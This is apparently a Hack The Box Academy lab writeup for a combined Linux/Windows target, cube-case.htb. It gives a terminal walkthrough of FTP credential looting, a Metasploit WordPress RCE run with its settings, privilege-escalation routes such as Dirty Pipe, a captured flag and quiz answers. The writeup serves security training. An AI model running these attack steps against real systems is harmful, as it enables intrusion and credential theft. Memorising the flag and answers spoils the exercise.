Skip to main content
← Back to HTB Writeups
MediumAcademy ModuleLinux + Windows10.129.233.210 · cube-case.htb

$ pentest_in_a_nutshell()

A full 24-section pentest engagement against a dual Linux/Windows target (cube-case.htb). Anonymous FTP exposes an SSH private key and bash history revealing credentials. WordPress on port 443 is exploited via Metasploit. Linux privilege escalation uses Dirty Pipe or SUID abuse. The Windows host runs Gitea with a Git Hooks RCE (2020-10-07) and a scheduled backup task vulnerable to code injection.

[24 sections·45 questions·13 modules]

Techniques

Anonymous FTP LootSSH Private Key TheftWordPress RCE (wp_hash_form_rce)Kernel Exploit (Dirty Pipe CVE-2022-0847)SUID Binary AbuseGitea Git Hooks RCEWinPEAS EnumerationScheduled Task AbusePowerShell Script Injection

Open Ports

21/tcpftpProFTPD (Debian)
22/tcpsshOpenSSH 8.9p1 Ubuntu
80/tcphttpnginx 1.18.0 (Ubuntu)
443/tcphttpsApache httpd 2.4.52 — WordPress 6.7.2
8000/tcpssl/httpVelociraptor (Go)
8001/tcpsslVelociraptor
8080/tcphttpApache httpd 2.4.52 (Ubuntu)
8889/tcpsslVelociraptor

Terminal Session

htb-ac-2145354@htb ~ cube-case.htb
┌─[us-academy-4]─[10.10.14.137]─[htb-ac-2145354@htb-orflkwmdyo]─[~]
└──╼ [★]$ nmap 10.129.233.210
# 8 TCP ports open:
# 21/ftp  22/ssh  80/http  443/https
# 8000/Velociraptor  8001/ssl  8080/http  8889/ssl

# FTP anonymous login → loot files
ftp 10.129.233.210 21
> anonymous login → wordpress_Blog_Setup_Update.txt + .bash_history + .ssh/id_rsa
> cat .bash_history
> echo "john:SuperSecurePass123" | sudo chpasswd  ← credentials in history!

# WordPress scan
wpscan -e --url https://10.129.233.210 --disable-tls-checks
# WordPress 6.7.2 · Theme: twentytwentyfive

# Metasploit → wp_hash_form_rce
msfconsole
use exploit/multi/http/wp_hash_form_rce
set rhosts 10.129.233.210 / rport 443 / ssl true / lhost 10.10.14.137
exploit
# Meterpreter shell as www-data (uid=33)

# Linux enum: hostname=ubuntu, kernel=5.15.0, OS=Ubuntu 22.04 (jammy)
# CVE-2022-0847 (DirtyPipe) available
# SUID binaries: 55 found via linpill.sh
# LXC container tool: /snap/bin/lxc

# Root flag
cat /root/flag.txt
# HTB{kXjCFCRfXDHN3EcJ3kAq2Wu4ZWdJ3jeQpnJWMLwGBi}

# Windows target (WIN01) enumeration
# Gitea 1.12.4 · 4 shares (non-standard: Devs)
# FileServer01 discovered in PowerShell script
# CorpBackupAgent scheduled task — runs every 2 min
# 5 hotfixes · WinPEAS: 10.0.17763 N/A Build 17763
# john SID: S-1-5-21-481531802-3248398329-2133938904-1002
# Gitea Git Hooks RCE → CVE disclosed 2020-10-07
# healthcheck.log first line: "Backup Prep Completed."
# backupprep.ps1 measures: cpu usage
# Escalation via: code injection

[✓] Full pentest completed — Linux + Windows flags captured!

Questions by Section (45 total)

1.

How many TCP ports in total are open on the target?

2.

What service version is running on TCP port 80? (Format: service x.y.z)

3.

What is the commonName that the SSL certificate provides? (Format: example.com)

Root Flag

← All WriteupsCybersecurity Quizzes →